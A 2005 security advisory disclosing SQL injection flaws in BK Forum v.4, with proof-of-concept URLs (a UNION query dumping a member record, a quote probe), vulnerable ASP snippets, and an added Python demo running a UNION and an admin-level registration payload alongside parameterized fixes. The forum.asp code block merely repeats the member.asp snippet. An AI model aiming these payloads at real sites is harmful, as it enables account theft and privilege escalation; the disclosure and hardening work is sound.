HSC Research Group - Advisories
Written by Hackers Center
Saturday, 23 April 2005 09:42
Dcrab's Security Advisory [Hsc Security Group] http://www.hackerscenter.com/ [dP Security] http://digitalparadox.org/
Get Dcrab's services to audit your web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah
Severity: High
Title: Multiple SQL injection vulnerabilities in BK Forum v.4
Date: 23/04/2005
Vendor: BKdev
Vendor Website: http://www.bkdev.net
Summary: There are multiple SQL injection vulnerabilities in BK Forum v.4. Values taken from the query string and from the registration form are concatenated directly into SQL statements without validation or escaping.
Proof of Concept Exploits:
member.asp: the id parameter is concatenated into the WHERE clause unquoted. Since memID is a numeric column, no quote character is needed to break out of the statement, and a UNION can pull arbitrary rows (here the record of the member named dc) into the result set:

http://forum.bkdev.net/member.asp?id=10%20UNION%20Select%20*%20from%20Member%20where%20memName%20=%20'dc'

[CODE]
id = request.querystring("id")
sql = "select * from Member where memID = " & id
set rs = conn.execute(sql)
[/CODE]

forum.asp: the forum parameter is handled the same way; a single quote is enough to show the input reaches the database unescaped:

http://forum.bkdev.net/forum.asp?forum='SQL INJECTION

[CODE]
id = request.querystring("id")
sql = "select * from Member where memID = " & id
set rs = conn.execute(sql)
[/CODE]

register.asp: all the form values are vulnerable to SQL injection. The string fields are wrapped in single quotes but never escaped, so a quote in any of them terminates the literal early. Note that memLevel is appended after the quoted fields as the server-side constant LEVEL_MEMBER, so closing the VALUES list from inside a form field lets the client choose its own level:

http://forum.bkdev.net/register.asp

[CODE]
sql = "insert into Member (memName, memPassword, memFirstName, memLastName, memEmail, memHomepage, " & _
      "memDate, memLevel, memSignature, memPic, memAbout, memAcceptNotification, memShowAvatar, memLoggedOn, " & _
      "memLastActive) values ('" & memname & "', '" & mempw & "', '" & firstname & "', '" & lastname & "', " & _
      "'" & email & "', '" & homepage & "', #" & now & "#, " & LEVEL_MEMBER & ", '" & signature & "', " & _
      "'" & picture & "', '" & about & "', " & notify & ", " & avatar & ", " & false & ", #" & now & "#)"
[/CODE]
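The following is an added example, not BK Forum's code and not part of the original advisory. It reproduces the two concatenation patterns above (the unquoted numeric id from member.asp and the quoted form values from register.asp) in Python against an in-memory SQLite database, runs the advisory's UNION payload and a register-time level escalation against them, and shows the hardened form of each: an integer type check plus parameter binding for the lookup, and a parameterized INSERT for registration. The Member table is a constructed stand-in with a reduced set of the advisory's columns, and the LEVEL_MEMBER / LEVEL_ADMIN values are assumptions for the demo, not BK Forum's real constants.

```python
import sqlite3

# Assumed values for the demo; the advisory only shows that LEVEL_MEMBER is a
# server-side constant appended after the quoted form fields.
LEVEL_MEMBER = 0
LEVEL_ADMIN = 9

# Payloads used by the demo (constructed; the first mirrors the advisory's URL, decoded).
UNION_PAYLOAD = "10 UNION Select * from Member where memName = 'dc'"
LEVEL_PAYLOAD = "eve', 'eve-pw', 'eve@example.invalid', 9) --"


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the Member table: a subset of the advisory's columns."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Member (memID INTEGER PRIMARY KEY, memName TEXT, "
        "memPassword TEXT, memEmail TEXT, memLevel INTEGER)"
    )
    conn.executemany(
        "INSERT INTO Member VALUES (?, ?, ?, ?, ?)",
        [
            (1, "dc", "admin-secret", "dc@example.invalid", LEVEL_ADMIN),
            (10, "alice", "alice-pw", "alice@example.invalid", LEVEL_MEMBER),
        ],
    )
    return conn


def vulnerable_member_lookup(conn, id_param: str):
    """member.asp pattern: the raw id value is spliced into the SQL text.
    memID is numeric, so the attacker needs no quote to break out."""
    sql = "select * from Member where memID = " + id_param
    return conn.execute(sql).fetchall()


def safe_member_lookup(conn, id_param: str):
    """Hardened form: enforce the integer type, then bind the value as a parameter."""
    mem_id = int(id_param)  # raises ValueError for "10 UNION ..." and similar
    return conn.execute("select * from Member where memID = ?", (mem_id,)).fetchall()


def vulnerable_register(conn, memname: str, mempw: str, email: str):
    """register.asp pattern: quoted but unescaped form values, with memLevel
    appended as a fixed constant after them. Returns (memName, memLevel) of the new row."""
    sql = (
        "insert into Member (memName, memPassword, memEmail, memLevel) values ('"
        + memname + "', '" + mempw + "', '" + email + "', " + str(LEVEL_MEMBER) + ")"
    )
    conn.execute(sql)
    return conn.execute(
        "select memName, memLevel from Member where memID = last_insert_rowid()"
    ).fetchone()


def safe_register(conn, memname: str, mempw: str, email: str):
    """Hardened form: every form value is bound as a parameter, so a quote in
    memName is stored literally and memLevel stays LEVEL_MEMBER."""
    conn.execute(
        "insert into Member (memName, memPassword, memEmail, memLevel) values (?, ?, ?, ?)",
        (memname, mempw, email, LEVEL_MEMBER),
    )
    return conn.execute(
        "select memName, memLevel from Member where memID = last_insert_rowid()"
    ).fetchone()


def demo() -> dict:
    """Run both payloads against the vulnerable and hardened functions."""
    conn = make_db()
    out = {"union_rows": vulnerable_member_lookup(conn, UNION_PAYLOAD)}
    try:
        safe_member_lookup(conn, UNION_PAYLOAD)
        out["safe_lookup_rejected"] = False
    except ValueError:
        out["safe_lookup_rejected"] = True
    out["vuln_register"] = vulnerable_register(conn, LEVEL_PAYLOAD, "real-pw", "real@example.invalid")
    out["safe_register"] = safe_register(conn, LEVEL_PAYLOAD, "real-pw", "real@example.invalid")
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

In classic ASP the equivalent of the `?` placeholders is an ADODB.Command with CommandType adCmdText and values supplied through Parameters.Append / CreateParameter, rather than string concatenation with `&`. The integer check on id matters independently of binding: the advisory's member.asp payload carries no quote at all, so quote-escaping alone would not have stopped it.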
Keep yourself updated; RSS feed at: http://digitalparadox.org/rss.ah
Author: These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com. Please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://digitalparadox.org/. Look out for my soon-to-be-released book on secure coding with PHP.